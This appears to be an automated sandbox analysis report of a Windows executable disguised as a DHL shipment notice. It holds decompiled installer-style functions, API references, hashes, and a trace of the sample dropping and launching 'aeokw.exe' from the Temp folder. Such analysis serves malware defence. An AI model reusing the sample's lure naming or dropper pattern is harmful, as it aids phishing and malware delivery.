                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$Timeout
                        • String ID: !
                        • API String ID: 1777923405-2657877971
                        • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                        • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
                        • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
                        • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404E77 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
			}



















                        0x00404e80
                        0x00404e85
                        0x00404e8d
                        0x00404e8e
                        0x00404e9b
                        0x00404ea3
                        0x00404ea4
                        0x00404ea6
                        0x00404ea8
                        0x00404eaa
                        0x00404ead
                        0x00404ead
                        0x00404eb4
                        0x00404eba
                        0x00404eba
                        0x00404ec1
                        0x00404ec8
                        0x00404ecb
                        0x00404ece
                        0x00404ece
                        0x00404ed2
                        0x00404ee2
                        0x00404ee4
                        0x00404ee7
                        0x00404e90
                        0x00404e90
                        0x00404e97
                        0x00404e97
                        0x00404eef
                        0x00404efa
                        0x00404f10
                        0x00404f21
                        0x00404f3d

                        APIs
                        • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                        • wsprintfW.USER32 ref: 00404F21
                        • SetDlgItemTextW.USER32 ref: 00404F34
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: ItemTextlstrlenwsprintf
                        • String ID: %u.%u%s%s
                        • API String ID: 3540041739-3551169577
                        • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                        • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
                        • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
                        • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405F3D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 58%
                        			E00405F3D(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




                        0x00405f3e
                        0x00405f4b
                        0x00405f4c
                        0x00405f57
                        0x00405f5f
                        0x00405f5f
                        0x00405f67

                        APIs
                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F4D
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405F5F
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharPrevlstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 2659869361-3081826266
                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405644 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 89%
                        			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f74 = _t16;
							E00405005();
						}
						L11:
						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F85(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404616(0x413);
				return 0;
			}





                        0x00405648
                        0x00405652
                        0x0040566e
                        0x00405690
                        0x00405693
                        0x00405699
                        0x004056a3
                        0x004056a4
                        0x004056a6
                        0x004056ac
                        0x004056ac
                        0x004056b6
                        0x00000000
                        0x004056c4
                        0x0040567b
                        0x004056b3
                        0x004056b3
                        0x00000000
                        0x004056b3
                        0x00405687
                        0x00405689
                        0x00000000
                        0x00405689
                        0x00405658
                        0x00000000
                        0x00000000
                        0x0040565f
                        0x00000000

                        APIs
                        • IsWindowVisible.USER32(?), ref: 00405673
                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                          • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Window$CallMessageProcSendVisible
                        • String ID:
                        • API String ID: 3748168415-3916222277
                        • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                        • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
                        • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
                        • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040653C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 90%
                        			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                        0x0040654a
                        0x0040654c
                        0x00406564
                        0x00406569
                        0x0040656e
                        0x004065ac
                        0x004065ac
                        0x00406570
                        0x00406582
                        0x0040658d
                        0x00406593
                        0x0040659e
                        0x00000000
                        0x00000000
                        0x0040659e
                        0x004065b2

                        APIs
                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F68,00000000,?,?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,?,?,004067A3,80000002), ref: 00406582
                        • RegCloseKey.ADVAPI32(?,?,004067A3,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,007A0F68), ref: 0040658D
                        Strings
                        • C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok, xrefs: 00406543
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CloseQueryValue
                        • String ID: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                        • API String ID: 3356406503-1777001369
                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                        • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405F89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E00405F89(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                        0x00405f8a
                        0x00405f94
                        0x00405f97
                        0x00405f9d
                        0x00405f9e
                        0x00405f9f
                        0x00405fa7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405fa7
                        0x00405fa9
                        0x00405fb1

                        APIs
                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00405F8F
                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00405F9F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharPrevlstrlen
                        • String ID: C:\Users\user\Desktop
                        • API String ID: 2709904686-224404859
                        • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction ID: 7456b8531bb3b8a4d8e8c00392aaf18f99b4ab5ae19bc30171d9ddc8328a16ac
                        • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                        • Instruction Fuzzy Hash: B1D05EB2411D219ED3126704DD0099F77A8EF5230174A4426E841E71A0D77C5C918AAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004060C3 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                        0x004060d3
                        0x004060d5
                        0x004060d8
                        0x00406104
                        0x004060dd
                        0x004060e6
                        0x004060eb
                        0x004060f6
                        0x004060f9
                        0x00406115
                        0x004060fb
                        0x00406102
                        0x00000000
                        0x00406102
                        0x0040610e
                        0x00406112
                        0x00406112
                        0x0040610c
                        0x00000000

                        APIs
                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
                        • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
                        • CharNextA.USER32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FC
                        • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: lstrlen$CharNextlstrcmpi
                        • String ID:
                        • API String ID: 190613189-0
                        • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                        • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
                        • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                        • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:7.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:9.4%
                        Total number of Nodes:1643
                        Total number of Limit Nodes:100
                        execution_graph 7485 d77577 7486 d717be __lock 58 API calls 7485->7486 7487 d7757e 7486->7487 7641 d71737 7644 d73ec8 7641->7644 7643 d7173c 7643->7643 7645 d73eeb 7644->7645 7646 d73ef8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7644->7646 7645->7646 7647 d73eef 7645->7647 7646->7647 7647->7643 7648 d71f37 7655 d758ce 7648->7655 7651 d71f4a 7652 d74831 _free 58 API calls 7651->7652 7654 d71f55 7652->7654 7668 d758d7 7655->7668 7657 d71f3c 7657->7651 7658 d75787 7657->7658 7659 d75793 __wsopen_helper 7658->7659 7660 d7442f __lock 58 API calls 7659->7660 7664 d7579f 7660->7664 7661 d75804 7698 d7581b 7661->7698 7663 d75810 __wsopen_helper 7663->7651 7664->7661 7666 d757d8 DeleteCriticalSection 7664->7666 7685 d77c39 7664->7685 7667 d74831 _free 58 API calls 7666->7667 7667->7664 7669 d758e3 __wsopen_helper 7668->7669 7670 d7442f __lock 58 API calls 7669->7670 7677 d758f2 7670->7677 7671 d75990 7681 d759b2 7671->7681 7673 d71f9d __getstream 59 API calls 7673->7677 7674 d7599c __wsopen_helper 7674->7657 7676 d75824 82 API calls __fflush_nolock 7676->7677 7677->7671 7677->7673 7677->7676 7678 d7597f 7677->7678 7679 d72007 __getstream 2 API calls 7678->7679 7680 d7598d 7679->7680 7680->7677 7684 d74599 LeaveCriticalSection 7681->7684 7683 d759b9 7683->7674 7684->7683 7686 d77c45 __wsopen_helper 7685->7686 7687 d77c71 7686->7687 7688 d77c59 7686->7688 7691 d71f5e __lock_file 59 API calls 7687->7691 7694 d77c69 __wsopen_helper 7687->7694 7689 d71cc3 __cftoe2_l 58 API calls 7688->7689 7690 d77c5e 7689->7690 7692 d71e89 __cftoe2_l 9 API calls 7690->7692 7693 d77c83 7691->7693 7692->7694 7701 d77bcd 7693->7701 7694->7664 7760 d74599 LeaveCriticalSection 7698->7760 7700 d75822 7700->7663 7702 d77bf0 7701->7702 7703 d77bdc 7701->7703 7706 d77bec 7702->7706 7720 d7586a 7702->7720 7704 d71cc3 __cftoe2_l 58 API calls 7703->7704 7705 d77be1 7704->7705 7708 d71e89 __cftoe2_l 9 API calls 7705->7708 7717 d77ca8 7706->7717 7708->7706 7712 d72873 __flush 58 API calls 7713 d77c0a 7712->7713 7730 d788a3 7713->7730 7715 d77c10 7715->7706 7716 d74831 _free 58 API calls 7715->7716 7716->7706 7718 d71fcd __wfsopen 2 API calls 7717->7718 7719 d77cae 7718->7719 7719->7694 7721 d7587d 7720->7721 7725 d758a1 7720->7725 7722 d72873 __flush 58 API calls 7721->7722 7721->7725 7723 d7589a 7722->7723 7724 d77d99 __write 78 API calls 7723->7724 7724->7725 7726 d7914b 7725->7726 7727 d77c04 7726->7727 7728 d79158 7726->7728 7727->7712 7728->7727 7729 d74831 _free 58 API calls 7728->7729 7729->7727 7731 d788af __wsopen_helper 7730->7731 7732 d788d3 7731->7732 7733 d788bc 7731->7733 7735 d7895e 7732->7735 7737 d788e3 7732->7737 7734 d71c8f __write 58 API calls 7733->7734 7736 d788c1 7734->7736 7738 d71c8f __write 58 API calls 7735->7738 7739 d71cc3 __cftoe2_l 58 API calls 7736->7739 7740 d78901 7737->7740 7741 d7890b 7737->7741 7742 d78906 7738->7742 7752 d788c8 __wsopen_helper 7739->7752 7744 d71c8f __write 58 API calls 7740->7744 7743 d76c88 ___lock_fhandle 59 API calls 7741->7743 7745 d71cc3 __cftoe2_l 58 API calls 7742->7745 7746 d78911 7743->7746 7744->7742 7747 d7896a 7745->7747 7748 d78924 7746->7748 7749 d7892f 7746->7749 7750 d71e89 __cftoe2_l 9 API calls 7747->7750 7751 d7897e __close_nolock 61 API calls 7748->7751 7753 d71cc3 __cftoe2_l 58 API calls 7749->7753 7750->7752 7754 d7892a 7751->7754 7752->7715 7753->7754 7756 d78956 7754->7756 7759 d7702e LeaveCriticalSection 7756->7759 7758 d7895c 7758->7752 7759->7758 7760->7700 7342 d716d3 7345 d7344b 7342->7345 7346 d736f3 __getptd_noexit 58 API calls 7345->7346 7347 d716e4 7346->7347 7488 d746f1 7489 d74869 __calloc_crt 58 API calls 7488->7489 7490 d746fb EncodePointer 7489->7490 7491 d74714 7490->7491 7348 d793d0 7349 d793e6 7348->7349 7350 d793da 7348->7350 7350->7349 7351 d793df CloseHandle 7350->7351 7351->7349 7492 d76470 RtlUnwind 7572 d72690 7573 d726b0 